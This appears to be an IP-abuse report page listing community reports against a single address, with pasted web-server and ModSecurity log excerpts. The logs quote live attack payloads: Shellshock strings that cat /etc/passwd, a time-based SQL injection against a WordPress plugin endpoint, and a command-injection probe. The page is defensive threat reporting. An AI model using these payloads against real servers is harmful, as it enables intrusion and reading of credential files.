Anonymous
2024-11-29 02:05:54
(1 year ago)
156.233.64.140 - - [28/Nov/2024:23:05:51 -0300] "GET /wp-admin/index.php HTTP/1.1" 404 56 "-" "Mozil ...
show more
156.233.64.140 - - [28/Nov/2024:23:05:51 -0300] "GET /wp-admin/index.php HTTP/1.1" 404 56 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0"
...
show less
Web App Attack
Anonymous
2024-11-28 09:16:00
(1 year ago)
SQL Injection
SQL Injection
๐ง๐ท
leolemos
2024-11-28 00:05:33
(1 year ago)
[Wed Nov 27 17:00:13.211654 2024] [cgid:error] [pid 2384262:tid 267829395845312] [client 156.233.64. ...
show more
[Wed Nov 27 17:00:13.211654 2024] [cgid:error] [pid 2384262:tid 267829395845312] [client 156.233.64.140:34818] AH01264: script not found or unable to stat: /usr/lib/cgi-bin/rpc
[Wed Nov 27 21:05:33.268422 2024] [cgid:error] [pid 2177640:tid 267829840244928] [client 156.233.64.140:48202] AH01264: script not found or unable to stat: /usr/lib/cgi-bin/stats, referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Wed Nov 27 21:05:33.270528 2024] [cgid:error] [pid 2177639:tid 267830117134528] [client 156.233.64.140:48264] AH01264: script not found or unable to stat: /usr/lib/cgi-bin/test, referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
show less
Brute-Force
Web App Attack
๐บ๐ธ
FABIO EGAS
2024-11-28 00:02:49
(1 year ago)
(mod_security) mod_security triggered on hostname [redacted] 156.233.64.140 (BR/Brazil/-)
SQL Injection
Anonymous
2024-11-27 23:37:02
(1 year ago)
156.233.64.140 - - [27/Nov/2024:20:36:24 -0300] "GET /etc/passwd HTTP/1.1" 400 166 "-" "-"
156.233.6 ...
show more
156.233.64.140 - - [27/Nov/2024:20:36:24 -0300] "GET /etc/passwd HTTP/1.1" 400 166 "-" "-"
156.233.64.140 - - [27/Nov/2024:20:36:35 -0300] "GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1" 404 56 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.20"
156.233.64.140 - - [27/Nov/2024:20:36:35 -0300] "POST /webadmin/auth/verification.php HTTP/1.1" 404 56 "https://renatamaranhao.com.br/webadmin/start/" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
156.233.64.140 - - [27/Nov/2024:20:36:36 -0300] "POST /boardDataWW.php HTTP/1.1" 404 56 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363"
156.233.64.140 - - [27/Nov/2024:20:36:37 -0300] "POST /wp-content/plugins/wsecure/wsecure-
...
show less
Web App Attack
Anonymous
2024-11-27 22:17:16
(1 year ago)
156.233.64.140 - - [27/Nov/2024:19:17:13 -0300] "GET /wp-admin/admin-ajax.php?action=ays_sccp_result ...
show more
156.233.64.140 - - [27/Nov/2024:19:17:13 -0300] "GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1" 404 56 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0"
...
show less
Web App Attack
๐บ๐ธ
hostseries
2024-11-27 19:00:56
(1 year ago)
Trigger: LF_MODSEC
Brute-Force
Anonymous
2024-11-27 04:30:10
(1 year ago)
Failed login attempt detected by Fail2Ban in plesk-modsecurity jail
Exploited Host
๐ง๐ท
TM
2024-11-26 14:31:00
(1 year ago)
GET /__debugging_center_utils___.php?log=;echo txyykvmpycggcxxxnlfofludjhbbcbts | id HTTP/1.1
Hacking
Web App Attack
Anonymous
2024-11-26 08:31:21
(1 year ago)
sql injection
Web App Attack
๐ง๐ท
SOC-BR
2024-11-26 07:01:48
(1 year ago)
Attack detected by Fortinet - applications3: Generic.Path.Traversal.Detection - 2024-11-25 09:35:55 ...
show more
Attack detected by Fortinet - applications3: Generic.Path.Traversal.Detection - 2024-11-25 09:35:55 - Source Port 56700
show less
Port Scan
Hacking
๐ง๐ท
TM
2024-11-25 19:35:00
(1 year ago)
GET /cgi-bin/status HTTP/1.1
Hacking
Web App Attack
Anonymous
2024-11-25 01:11:48
(1 year ago)
sql injection
Web App Attack
Anonymous
2024-11-24 22:55:38
(1 year ago)
wordpress-trap
Web App Attack
๐ง๐ท
ufn.edu.br
2024-11-24 14:40:33
(1 year ago)
[Sun Nov 24 12:40:32.938944 2024] [:error] [pid 13569] [client 156.233.64.140] ModSecurity: Access d ...
show more
[Sun Nov 24 12:40:32.938944 2024] [:error] [pid 13569] [client 156.233.64.140] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\x5cxe2\\x5cx80\\x5cx94\\x5cr\\x5cn"] [severity "CRITICAL"] [hostname "ws12vmsma01.ufn.edu.br"] [uri "/"] [unique_id "Z0M64H8AAAEAADUByb8AAAAI"]
...
show less
DDoS Attack
Web App Attack